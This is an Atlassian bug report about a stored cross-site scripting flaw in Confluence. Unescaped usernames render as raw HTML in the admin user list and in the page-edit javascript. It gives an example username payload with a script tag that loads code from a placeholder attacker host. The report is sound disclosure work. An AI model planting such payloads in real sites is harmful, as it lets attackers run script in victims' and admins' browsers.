XSS bug: usernames not HTML-encoded in all places

Type atlassian
Reporter jefft
Modified 2017-02-17T05:35:09


When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

Two places I've spotted the raw HTML so far:

  • Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
  • When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:
        if ($('edit-personal').checked) $('editPermission').value = "&lt;script src=http://drevil.com/xss&gt;fred&lt;/script&gt;";